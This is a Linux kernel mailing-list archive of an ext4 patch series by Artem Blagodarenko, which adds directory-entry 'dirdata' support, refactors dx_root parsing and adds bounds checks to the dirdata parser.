@@ -2061,7 +2076,7 @@ int ext4_find_dest_de(struct inode *dir, struct buffer_head *bh,
return -EFSCORRUPTED;
if (ext4_match(dir, fname, de))
return -EEXIST;
- nlen = ext4_dir_rec_len(de->name_len, dir);
+ nlen = ext4_dir_entry_len(de, buf_size, dir);
rlen = ext4_rec_len_from_disk(de->rec_len, buf_size);
if ((de->inode ? rlen - nlen : rlen) >= reclen)
break;
@@ -2084,7 +2099,7 @@ void ext4_insert_dentry(struct inode *dir,
int nlen, rlen;
- nlen = ext4_dir_rec_len(de->name_len, dir);
+ nlen = ext4_dir_entry_len(de, buf_size, dir);
rlen = ext4_rec_len_from_disk(de->rec_len, buf_size);
if (de->inode) {
struct ext4_dir_entry_2 *de1 =
@@ -2122,14 +2137,18 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
{
unsigned int blocksize = dir->i_sb->s_blocksize;
int csum_size = 0;
- int err, err2;
+ int err, err2, dlen = 0;
+ unsigned char *data = NULL;
+ /* Deliver data in any appropriate way here. Now it is NULL */
if (ext4_has_feature_metadata_csum(inode->i_sb))
csum_size = sizeof(struct ext4_dir_entry_tail);
if (!de) {
+ if (data)
+ dlen = (*data) + 1;
err = ext4_find_dest_de(dir, bh, bh->b_data,
- blocksize - csum_size, fname, &de);
+ blocksize - csum_size, fname, &de, dlen);
if (err)
return err;
}
@@ -2284,7 +2303,12 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
blocksize);
/* initialize hashing info */
- dx_info = dx_get_dx_info(dot_de);
+ dx_info = dx_get_dx_info(dir, dot_de);
+ if (IS_ERR(dx_info)) {
+ brelse(bh2);
+ brelse(bh);
+ return PTR_ERR(dx_info);
+ }
memset(dx_info, 0, sizeof(*dx_info));
dx_info->info_length = sizeof(*dx_info);
if (ext4_hash_in_dirent(dir))
@@ -2342,7 +2366,7 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
*/
if (retval)
ext4_mark_inode_dirty(handle, dir);
- dx_release(frames);
+ dx_release(dir, frames);
brelse(bh2);
return retval;
}
@@ -2617,8 +2641,13 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
/* Set up root */
dx_set_count(entries, 1);
dx_set_block(entries + 0, newblock);
- info = dx_get_dx_info((struct ext4_dir_entry_2 *)
+ info = dx_get_dx_info(dir, (struct ext4_dir_entry_2 *)
frames[0].bh->b_data);
+ if (IS_ERR(info)) {
+ err = PTR_ERR(info);
+ brelse(bh2);
+ goto journal_error;
+ }
info->indirect_levels += 1;
dxtrace(printk(KERN_DEBUG
"Creating %d level index...\n",
@@ -2646,7 +2675,7 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
ext4_std_error(dir->i_sb, err); /* this is a no-op if err == 0 */
cleanup:
brelse(bh);
- dx_release(frames);
+ dx_release(dir, frames);
/* @restart is true means htree-path has been changed, we need to
* repeat dx_probe() to find out valid htree-path
*/
@@ -2938,7 +2967,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
de->inode = cpu_to_le32(inode->i_ino);
de->name_len = 1;
- de->rec_len = ext4_rec_len_to_disk(ext4_dir_rec_len(de->name_len, NULL),
+ de->rec_len = ext4_rec_len_to_disk(ext4_dirent_rec_len(de->name_len, NULL),
blocksize);
memcpy(de->name, ".", 2);
ext4_set_de_type(inode->i_sb, de, S_IFDIR);
@@ -2950,7 +2979,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
ext4_set_de_type(inode->i_sb, de, S_IFDIR);
if (inline_buf) {
de->rec_len = ext4_rec_len_to_disk(
- ext4_dir_rec_len(de->name_len, NULL),
+ ext4_dirent_rec_len(de->name_len, NULL),
blocksize);
de = ext4_next_entry(de, blocksize);
header_size = (char *)de - bh->b_data;
@@ -2959,7 +2988,7 @@ int ext4_init_dirblock(handle_t *handle, struct inode *inode,
blocksize - csum_size);
} else {
de->rec_len = ext4_rec_len_to_disk(blocksize -
- (csum_size + ext4_dir_rec_len(1, NULL)),
+ (csum_size + ext4_dirent_rec_len(1, NULL)),
blocksize);
}
@@ -3082,8 +3111,8 @@ bool ext4_empty_dir(struct inode *inode)
}
sb = inode->i_sb;
- if (inode->i_size < ext4_dir_rec_len(1, NULL) +
- ext4_dir_rec_len(2, NULL)) {
+ if (inode->i_size < ext4_dirent_rec_len(1, NULL) +
+ ext4_dirent_rec_len(2, NULL)) {
EXT4_ERROR_INODE(inode, "invalid size");
return false;
}
--
2.43.7
^ permalink raw reply related
* [PATCH v4 07/11] ext4: add ext4_dir_entry_len() and harden dirdata parsing
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Introduce ext4_dir_entry_len() helper to compute the required
rec_len for a directory entry, taking into account dirdata and
casefold+fscrypt hash space.
Convert ext4_dirent_get_data_len() to take the decoded rec_len
as an argument and add bounds checking when walking dirdata
extensions to avoid overruns on malformed entries.
Update dx_root_limit() to take the '.' entry and derive the available
entry space from the dx_root_info location and its info_length, instead
of open-coding ext4_dir_rec_len() for the '.' and '..' entries.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 51 ++++++++++++++++++++++++++++++++++++++++++++++---
fs/ext4/namei.c | 23 ++++++++++++++--------
2 files changed, 63 insertions(+), 11 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 2f29f50a12ac..a369a0cd04bc 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -4075,6 +4075,7 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
/*
* ext4_dirent_get_data_len() - Compute the total dirdata length for an entry.
* @de: directory entry
+ * @rec_len: the record length of the directory entry (decoded)
*
* Computes the length of optional data stored after the filename (and its
* implicit NUL terminator). Each extension is indicated by a bit in the
@@ -4083,22 +4084,41 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
*
* Returns 0 for tail entries and for entries with no dirdata.
*/
-static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
+static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de,
+ unsigned int rec_len)
{
__u8 extra_data_flags;
struct ext4_dirent_data_header *ddh;
int dlen = 0;
+ unsigned int offset;
if (ext4_dir_entry_is_tail(de))
return 0;
extra_data_flags = (de->file_type & ~EXT4_FT_MASK) >> 4;
- ddh = (struct ext4_dirent_data_header *)(de->name + de->name_len +
- 1 /* NUL terminator */);
+ /* offset from start of entry to after filename + NUL */
+ offset = EXT4_BASE_DIR_LEN + de->name_len + 1;
+ /* bounds check: ensure we start reading within the entry */
+ if (offset >= rec_len)
+ return 0;
+
+ ddh = (struct ext4_dirent_data_header *)((char *)de + offset);
+
while (extra_data_flags) {
if (extra_data_flags & 1) {
+ /* bounds check before reading ddh_length */
+ if (offset + sizeof(*ddh) >
+ rec_len)
+ return dlen;
+
+ /* validate ddh_length is reasonable */
+ if (ddh->ddh_length == 0 || ddh->ddh_length >
+ rec_len - offset)
+ return dlen;
+
dlen += ddh->ddh_length + (dlen == 0);
+ offset += ddh->ddh_length;
ddh = ext4_dirdata_next(ddh);
}
extra_data_flags >>= 1;
@@ -4106,6 +4126,31 @@ static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
return dlen;
}
+/*
+ * ext4_dir_entry_len() - Compute the required rec_len for a directory entry.
+ * @de: directory entry (used to read name_len and any dirdata length)
+ * @blocksize: size of the buffer @de lives in (the real directory block
+ * size, or the smaller inline-data buffer size for inline
+ * directories) -- used only to decode @de->rec_len's "0/65535
+ * means rest of buffer" sentinel correctly.
+ * @dir: directory inode (may be NULL for '.' and '..' entries, which
+ * never carry the casefold+fscrypt hash regardless of the
+ * directory's feature flags)
+ *
+ * Returns the minimum record length needed to hold @de, rounded up to the
+ * directory alignment and including room for the casefold+fscrypt hash if
+ * the directory requires it.
+ */
+static inline unsigned int ext4_dir_entry_len(struct ext4_dir_entry_2 *de,
+ unsigned int blocksize,
+ const struct inode *dir)
+{
+ unsigned int rec_len = ext4_rec_len_from_disk(de->rec_len, blocksize);
+ unsigned int dirdata = ext4_dirent_get_data_len(de, rec_len);
+
+ return ext4_dir_rec_len(de->name_len + dirdata, dir);
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 61410fa0effa..e2dda8dee77c 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -578,11 +578,15 @@ static inline void dx_set_limit(struct dx_entry *entries, unsigned value)
((struct dx_countlimit *) entries)->limit = cpu_to_le16(value);
}
-static inline unsigned dx_root_limit(struct inode *dir, unsigned infosize)
+static inline unsigned dx_root_limit(struct inode *dir,
+ struct ext4_dir_entry_2 *dot_de)
{
- unsigned int entry_space = dir->i_sb->s_blocksize -
- ext4_dir_rec_len(1, NULL) -
- ext4_dir_rec_len(2, NULL) - infosize;
+ struct dx_root_info *info;
+ unsigned int entry_space;
+
+ info = dx_get_dx_info(dot_de);
+ entry_space = dir->i_sb->s_blocksize - ((char *)info - (char *)dot_de) -
+ info->info_length;
if (ext4_has_feature_metadata_csum(dir->i_sb))
entry_space -= sizeof(struct dx_tail);
@@ -858,10 +862,13 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
entries = (struct dx_entry *)(((char *)info) + info->info_length);
- if (dx_get_limit(entries) != dx_root_limit(dir, info->info_length)) {
+ if (dx_get_limit(entries) !=
+ dx_root_limit(dir, (struct ext4_dir_entry_2 *)frame->bh->b_data)) {
ext4_warning_inode(dir, "dx entry: limit %u != root limit %u",
dx_get_limit(entries),
- dx_root_limit(dir, info->info_length));
+ dx_root_limit(dir,
+ (struct ext4_dir_entry_2 *)frame->bh->b_data
+ ));
goto fail;
}
@@ -2286,10 +2293,10 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
dx_info->hash_version =
EXT4_SB(dir->i_sb)->s_def_hash_version;
- entries = (void *)dx_info + sizeof(*dx_info);
+ entries = (void *)dx_info + dx_info->info_length;
dx_set_block(entries, 1);
dx_set_count(entries, 1);
- dx_set_limit(entries, dx_root_limit(dir, sizeof(*dx_info)));
+ dx_set_limit(entries, dx_root_limit(dir, dot_de));
/* Initialize as for dx_probe */
fname->hinfo.hash_version = dx_info->hash_version;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 06/11] ext4: preserve dirdata bits in get_dtype()
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Mask the filetype with EXT4_FT_MASK when indexing
ext4_filetype_table[] to avoid using dirdata bits as an index.
Preserve the extra bits
stored in the upper part of filetype and propagate them to the
returned dtype value.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 9 ++++++---
1 file changed, 6 insertions(+), 3 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 98603aa44693..2f29f50a12ac 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -3046,12 +3046,15 @@ static const unsigned char ext4_filetype_table[] = {
DT_UNKNOWN, DT_REG, DT_DIR, DT_CHR, DT_BLK, DT_FIFO, DT_SOCK, DT_LNK
};
-static inline unsigned char get_dtype(struct super_block *sb, int filetype)
+static inline unsigned char get_dtype(struct super_block *sb, int filetype)
{
- if (!ext4_has_feature_filetype(sb) || filetype >= EXT4_FT_MAX)
+ unsigned char fl_index = filetype & EXT4_FT_MASK;
+
+ if (!ext4_has_feature_filetype(sb) || fl_index >= EXT4_FT_MAX)
return DT_UNKNOWN;
- return ext4_filetype_table[filetype];
+ return (ext4_filetype_table[fl_index]) |
+ (filetype & ~EXT4_FT_MASK);
}
extern int ext4_check_all_de(struct inode *dir, struct buffer_head *bh,
void *buf, int buf_size);
--
2.43.7
^ permalink raw reply related
* [PATCH v4 05/11] ext4: add dirdata format definitions and access helpers
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Define the on-disk format for ext4 directory entry extension data.
The upper four bits of de->file_type indicate the presence of
optional data stored after the filename NUL terminator. This patch
defines flags for LUFID, 64-bit inode numbers, and casefold hash
data stored in that area.
Add struct ext4_dirent_data_header to describe variable-length
extension records and struct ext4_dirent_hash for hash storage used
by casefold and fscrypt.
Provide ext4_dirdata_next() to advance to the next extension record
and ext4_dirent_get_data_len() to compute the total extension data
length associated with a directory entry.
No functional changes.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 83 ++++++++++++++++++++++++++++++++++++++++++++++++++
1 file changed, 83 insertions(+)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index 9400bc2858a5..98603aa44693 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -2556,6 +2556,49 @@ struct ext4_dir_entry_tail {
#define EXT4_FT_SYMLINK 7
#define EXT4_FT_MAX 8
+#define EXT4_FT_MASK 0xf
+
+#if EXT4_FT_MAX > EXT4_FT_MASK
+#error "conflicting EXT4_FT_MAX and EXT4_FT_MASK"
+#endif
+
+/*
+ * d_type has 4 unused bits, so it can hold four types of data. These different
+ * types of data (e.g. fscrypt hash, high 32 bits of 64-bit inode number) can be
+ * stored, in flag order, after file-name in ext4 dirent.
+ *
+ * These flags are added to d_type if ext4 dirent has extra data after
+ * filename. This data length is variable and length is stored in first byte
+ * of data. Data starts after filename NUL byte.
+ */
+#define EXT4_DIRENT_LUFID 0x10
+#define EXT4_DIRENT_INO64 0x20
+#define EXT4_DIRENT_CFHASH 0x40
+
+struct ext4_fid {
+ char fid[16]; /* 128-bit unique file identifier */
+};
+
+struct ext4_dirent_data_header {
+ /* length of this header + the whole data blob */
+ __u8 ddh_length;
+} __packed;
+
+struct ext4_dirent_fid {
+ struct ext4_dirent_data_header df_header;
+ struct ext4_fid df_fid[];
+};
+
+#define EXT4_LUFID_MAGIC 0xAD200907UL
+struct ext4_dentry_param {
+ __u32 edp_magic; /* EXT4_LUFID_MAGIC */
+ struct ext4_dirent_fid edp_dfid;
+};
+
+struct ext4_dirent_hash {
+ struct ext4_dirent_data_header dh_header;
+ struct ext4_dir_entry_hash dh_hash;
+} __packed;
#define EXT4_FT_DIR_CSUM 0xDE
@@ -4004,6 +4047,12 @@ static inline void ext4_clear_io_unwritten_flag(ext4_io_end_t *io_end)
io_end->flag &= ~EXT4_IO_END_UNWRITTEN;
}
+/*
+ * Advance to the next dirdata record header starting from @ddh.
+ */
+#define ext4_dirdata_next(ddh) \
+ ((struct ext4_dirent_data_header *)((char *)(ddh) + (ddh)->ddh_length))
+
/*
* ext4_dir_entry_is_tail() - Check if a directory entry is a tail entry.
* @de: directory entry to check
@@ -4020,6 +4069,40 @@ static inline bool ext4_dir_entry_is_tail(struct ext4_dir_entry_2 *de)
t->det_reserved_ft == EXT4_FT_DIR_CSUM;
}
+/*
+ * ext4_dirent_get_data_len() - Compute the total dirdata length for an entry.
+ * @de: directory entry
+ *
+ * Computes the length of optional data stored after the filename (and its
+ * implicit NUL terminator). Each extension is indicated by a bit in the
+ * high 4 bits of de->file_type; the first byte of each extension is its
+ * length (including that length byte itself).
+ *
+ * Returns 0 for tail entries and for entries with no dirdata.
+ */
+static inline int ext4_dirent_get_data_len(struct ext4_dir_entry_2 *de)
+{
+ __u8 extra_data_flags;
+ struct ext4_dirent_data_header *ddh;
+ int dlen = 0;
+
+ if (ext4_dir_entry_is_tail(de))
+ return 0;
+
+ extra_data_flags = (de->file_type & ~EXT4_FT_MASK) >> 4;
+ ddh = (struct ext4_dirent_data_header *)(de->name + de->name_len +
+ 1 /* NUL terminator */);
+
+ while (extra_data_flags) {
+ if (extra_data_flags & 1) {
+ dlen += ddh->ddh_length + (dlen == 0);
+ ddh = ext4_dirdata_next(ddh);
+ }
+ extra_data_flags >>= 1;
+ }
+ return dlen;
+}
+
extern const struct iomap_ops ext4_iomap_ops;
extern const struct iomap_ops ext4_iomap_report_ops;
--
2.43.7
^ permalink raw reply related
* [PATCH v4 04/11] ext4: refactor dx_root to support variable dirent sizes
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4
Cc: adilger.kernel, Artem Blagodarenko, Pravin Shelar, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Split the monolithic definition of struct dx_root to separate dx_root_info
from the fake struct ext4_dir_entry_2 for improved code readability.
This allows "." and ".." dirents to have different sizes if necessary,
since we can't assume a rec_len of 12 if dx_root dirents have dirdata.
Adds dx_get_dx_info() accessor instead of complex typecast at callers.
Does not change any functionality.
Signed-off-by: Pravin Shelar <pravin.shelar@sun.com>
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/namei.c | 145 +++++++++++++++++++++++-------------------------
1 file changed, 70 insertions(+), 75 deletions(-)
diff --git a/fs/ext4/namei.c b/fs/ext4/namei.c
index 2fc14332fab7..61410fa0effa 100644
--- a/fs/ext4/namei.c
+++ b/fs/ext4/namei.c
@@ -244,22 +244,13 @@ struct dx_entry
* hash version mod 4 should never be 0. Sincerely, the paranoia department.
*/
-struct dx_root
+struct dx_root_info
{
- struct fake_dirent dot;
- char dot_name[4];
- struct fake_dirent dotdot;
- char dotdot_name[4];
- struct dx_root_info
- {
- __le32 reserved_zero;
- u8 hash_version;
- u8 info_length; /* 8 */
- u8 indirect_levels;
- u8 unused_flags;
- }
- info;
- struct dx_entry entries[];
+ __le32 reserved_zero;
+ u8 hash_version;
+ u8 info_length; /* 8 */
+ u8 indirect_levels;
+ u8 unused_flags;
};
struct dx_node
@@ -536,6 +527,16 @@ ext4_next_entry(struct ext4_dir_entry_2 *p, unsigned long blocksize)
* Future: use high four bits of block for coalesce-on-delete flags
* Mask them off for now.
*/
+static struct dx_root_info *dx_get_dx_info(void *de_buf)
+{
+ /* get dotdot first */
+ de_buf = de_buf + ext4_dir_rec_len(1, NULL);
+
+ /* dx root info is after dotdot entry */
+ de_buf = de_buf + ext4_dir_rec_len(2, NULL);
+
+ return (struct dx_root_info *)de_buf;
+}
static inline ext4_lblk_t dx_get_block(struct dx_entry *entry)
{
@@ -783,7 +784,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
{
unsigned count, indirect, level, i;
struct dx_entry *at, *entries, *p, *q, *m;
- struct dx_root *root;
+ struct dx_root_info *info;
struct dx_frame *frame = frame_in;
struct dx_frame *ret_err = ERR_PTR(ERR_BAD_DX_DIR);
u32 hash;
@@ -795,23 +796,24 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
if (IS_ERR(frame->bh))
return (struct dx_frame *) frame->bh;
- root = (struct dx_root *) frame->bh->b_data;
- if (root->info.hash_version != DX_HASH_TEA &&
- root->info.hash_version != DX_HASH_HALF_MD4 &&
- root->info.hash_version != DX_HASH_LEGACY &&
- root->info.hash_version != DX_HASH_SIPHASH) {
- ext4_warning_inode(dir, "Unrecognised inode hash code %u",
- root->info.hash_version);
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)frame->bh->b_data);
+ if (info->hash_version != DX_HASH_TEA &&
+ info->hash_version != DX_HASH_HALF_MD4 &&
+ info->hash_version != DX_HASH_LEGACY &&
+ info->hash_version != DX_HASH_SIPHASH) {
+ ext4_warning(dir->i_sb,
+ "Unrecognised inode hash code %d for directory #%llu",
+ info->hash_version, dir->i_ino);
goto fail;
}
if (ext4_hash_in_dirent(dir)) {
- if (root->info.hash_version != DX_HASH_SIPHASH) {
+ if (info->hash_version != DX_HASH_SIPHASH) {
ext4_warning_inode(dir,
"Hash in dirent, but hash is not SIPHASH");
goto fail;
}
} else {
- if (root->info.hash_version == DX_HASH_SIPHASH) {
+ if (info->hash_version == DX_HASH_SIPHASH) {
ext4_warning_inode(dir,
"Hash code is SIPHASH, but hash not in dirent");
goto fail;
@@ -819,7 +821,7 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
}
if (fname)
hinfo = &fname->hinfo;
- hinfo->hash_version = root->info.hash_version;
+ hinfo->hash_version = info->hash_version;
if (hinfo->hash_version <= DX_HASH_TEA)
hinfo->hash_version += EXT4_SB(dir->i_sb)->s_hash_unsigned;
hinfo->seed = EXT4_SB(dir->i_sb)->s_hash_seed;
@@ -835,13 +837,13 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
}
hash = hinfo->hash;
- if (root->info.unused_flags & 1) {
+ if (info->unused_flags & 1) {
ext4_warning_inode(dir, "Unimplemented hash flags: %#06x",
- root->info.unused_flags);
+ info->unused_flags);
goto fail;
}
- indirect = root->info.indirect_levels;
+ indirect = info->indirect_levels;
if (indirect >= ext4_dir_htree_level(dir->i_sb)) {
ext4_warning(dir->i_sb,
"Directory (ino: %llu) htree depth %#06x exceed"
@@ -854,14 +856,12 @@ dx_probe(struct ext4_filename *fname, struct inode *dir,
goto fail;
}
- entries = (struct dx_entry *)(((char *)&root->info) +
- root->info.info_length);
+ entries = (struct dx_entry *)(((char *)info) + info->info_length);
- if (dx_get_limit(entries) != dx_root_limit(dir,
- root->info.info_length)) {
+ if (dx_get_limit(entries) != dx_root_limit(dir, info->info_length)) {
ext4_warning_inode(dir, "dx entry: limit %u != root limit %u",
dx_get_limit(entries),
- dx_root_limit(dir, root->info.info_length));
+ dx_root_limit(dir, info->info_length));
goto fail;
}
@@ -947,7 +947,7 @@ static void dx_release(struct dx_frame *frames)
if (frames[0].bh == NULL)
return;
- info = &((struct dx_root *)frames[0].bh->b_data)->info;
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)frames[0].bh->b_data);
/* save local copy, "info" may be freed after brelse() */
indirect_levels = info->indirect_levels;
for (i = 0; i <= indirect_levels; i++) {
@@ -2159,44 +2159,38 @@ static int add_dirent_to_buf(handle_t *handle, struct ext4_filename *fname,
return err ? err : err2;
}
-static bool ext4_check_dx_root(struct inode *dir, struct dx_root *root)
+static bool ext4_check_dx_root(struct inode *dir,
+ struct ext4_dir_entry_2 *dot_de,
+ struct ext4_dir_entry_2 *dotdot_de,
+ struct ext4_dir_entry_2 **entry)
{
- struct fake_dirent *fde;
const char *error_msg;
- unsigned int rlen;
unsigned int blocksize = dir->i_sb->s_blocksize;
- char *blockend = (char *)root + dir->i_sb->s_blocksize;
+ struct ext4_dir_entry_2 *de = NULL;
- fde = &root->dot;
- if (unlikely(fde->name_len != 1)) {
+ if (unlikely(dot_de->name_len != 1)) {
error_msg = "invalid name_len for '.'";
goto corrupted;
}
- if (unlikely(strncmp(root->dot_name, ".", fde->name_len))) {
+ if (unlikely(strncmp(dot_de->name, ".", dot_de->name_len))) {
error_msg = "invalid name for '.'";
goto corrupted;
}
- rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
- if (unlikely((char *)fde + rlen >= blockend)) {
- error_msg = "invalid rec_len for '.'";
- goto corrupted;
- }
- fde = &root->dotdot;
- if (unlikely(fde->name_len != 2)) {
+ if (unlikely(dotdot_de->name_len != 2)) {
error_msg = "invalid name_len for '..'";
goto corrupted;
}
- if (unlikely(strncmp(root->dotdot_name, "..", fde->name_len))) {
+ if (unlikely(strncmp(dotdot_de->name, "..", dotdot_de->name_len))) {
error_msg = "invalid name for '..'";
goto corrupted;
}
- rlen = ext4_rec_len_from_disk(fde->rec_len, blocksize);
- if (unlikely((char *)fde + rlen >= blockend)) {
+ de = ext4_next_entry(dotdot_de, blocksize);
+ if ((char *)de >= (((char *)dot_de) + blocksize)) {
error_msg = "invalid rec_len for '..'";
goto corrupted;
}
-
+ *entry = de;
return true;
corrupted:
@@ -2214,16 +2208,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
struct inode *inode, struct buffer_head *bh)
{
struct buffer_head *bh2;
- struct dx_root *root;
struct dx_frame frames[EXT4_HTREE_LEVEL], *frame;
struct dx_entry *entries;
- struct ext4_dir_entry_2 *de, *de2;
+ struct ext4_dir_entry_2 *de, *de2, *dot_de, *dotdot_de;
char *data2, *top;
unsigned len;
int retval;
unsigned blocksize;
ext4_lblk_t block;
- struct fake_dirent *fde;
+ struct dx_root_info *dx_info;
int csum_size = 0;
if (ext4_has_feature_metadata_csum(inode->i_sb))
@@ -2240,17 +2233,15 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
return retval;
}
- root = (struct dx_root *) bh->b_data;
- if (!ext4_check_dx_root(dir, root)) {
+ dot_de = (struct ext4_dir_entry_2 *)bh->b_data;
+ dotdot_de = ext4_next_entry(dot_de, blocksize);
+ if (!ext4_check_dx_root(dir, dot_de, dotdot_de, &de)) {
brelse(bh);
return -EFSCORRUPTED;
}
/* The 0th block becomes the root, move the dirents out */
- fde = &root->dotdot;
- de = (struct ext4_dir_entry_2 *)((char *)fde +
- ext4_rec_len_from_disk(fde->rec_len, blocksize));
- len = ((char *) root) + (blocksize - csum_size) - (char *) de;
+ len = ((char *)dot_de) + (blocksize - csum_size) - (char *)de;
/* Allocate new block for the 0th block's dirents */
bh2 = ext4_append(handle, dir, &block);
@@ -2281,24 +2272,27 @@ static int make_indexed_dir(handle_t *handle, struct ext4_filename *fname,
ext4_initialize_dirent_tail(bh2, blocksize);
/* Initialize the root; the dot dirents already exist */
- de = (struct ext4_dir_entry_2 *) (&root->dotdot);
- de->rec_len = ext4_rec_len_to_disk(
- blocksize - ext4_dir_rec_len(2, NULL), blocksize);
- memset (&root->info, 0, sizeof(root->info));
- root->info.info_length = sizeof(root->info);
+ dotdot_de->rec_len =
+ ext4_rec_len_to_disk(blocksize - le16_to_cpu(dot_de->rec_len),
+ blocksize);
+
+ /* initialize hashing info */
+ dx_info = dx_get_dx_info(dot_de);
+ memset(dx_info, 0, sizeof(*dx_info));
+ dx_info->info_length = sizeof(*dx_info);
if (ext4_hash_in_dirent(dir))
- root->info.hash_version = DX_HASH_SIPHASH;
+ dx_info->hash_version = DX_HASH_SIPHASH;
else
- root->info.hash_version =
+ dx_info->hash_version =
EXT4_SB(dir->i_sb)->s_def_hash_version;
- entries = root->entries;
+ entries = (void *)dx_info + sizeof(*dx_info);
dx_set_block(entries, 1);
dx_set_count(entries, 1);
- dx_set_limit(entries, dx_root_limit(dir, sizeof(root->info)));
+ dx_set_limit(entries, dx_root_limit(dir, sizeof(*dx_info)));
/* Initialize as for dx_probe */
- fname->hinfo.hash_version = root->info.hash_version;
+ fname->hinfo.hash_version = dx_info->hash_version;
if (fname->hinfo.hash_version <= DX_HASH_TEA)
fname->hinfo.hash_version += EXT4_SB(dir->i_sb)->s_hash_unsigned;
fname->hinfo.seed = EXT4_SB(dir->i_sb)->s_hash_seed;
@@ -2608,7 +2602,7 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
if (restart || err)
goto journal_error;
} else {
- struct dx_root *dxroot;
+ struct dx_root_info *info;
memcpy((char *) entries2, (char *) entries,
icount * sizeof(struct dx_entry));
dx_set_limit(entries2, dx_node_limit(dir));
@@ -2616,8 +2610,9 @@ static int ext4_dx_add_entry(handle_t *handle, struct ext4_filename *fname,
/* Set up root */
dx_set_count(entries, 1);
dx_set_block(entries + 0, newblock);
- dxroot = (struct dx_root *)frames[0].bh->b_data;
- dxroot->info.indirect_levels += 1;
+ info = dx_get_dx_info((struct ext4_dir_entry_2 *)
+ frames[0].bh->b_data);
+ info->indirect_levels += 1;
dxtrace(printk(KERN_DEBUG
"Creating %d level index...\n",
dxroot->info.indirect_levels));
--
2.43.7
^ permalink raw reply related
* [PATCH v4 03/11] ext4: add ext4_dir_entry_is_tail()
From: Artem Blagodarenko @ 2026-06-24 13:36 UTC (permalink / raw)
To: linux-ext4; +Cc: adilger.kernel, Artem Blagodarenko, Andreas Dilger
In-Reply-To: <20260624133642.18438-1-ablagodarenko@thelustrecollective.com>
From: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Replace open-coded checks for directory tail entries with a call
to ext4_dir_entry_is_tail(). This helper will also be used by
upcoming changes.
Signed-off-by: Artem Blagodarenko <artem.blagodarenko@gmail.com>
Reviewed-by: Andreas Dilger <adilger@dilger.ca>
---
fs/ext4/ext4.h | 16 ++++++++++++++++
fs/ext4/namei.c | 7 +------
2 files changed, 17 insertions(+), 6 deletions(-)
diff --git a/fs/ext4/ext4.h b/fs/ext4/ext4.h
index b37c136ea3ab..9400bc2858a5 100644
--- a/fs/ext4/ext4.h
+++ b/fs/ext4/ext4.h
@@ -4004,6 +4004,22 @@ static inline void ext4_clear_io_unwritten_flag(ext4_io_end_t *io_end)
io_end->flag &= ~EXT4_IO_END_UNWRITTEN;
}
+/*
+ * ext4_dir_entry_is_tail() - Check if a directory entry is a tail entry.
+ * @de: directory entry to check
+ *
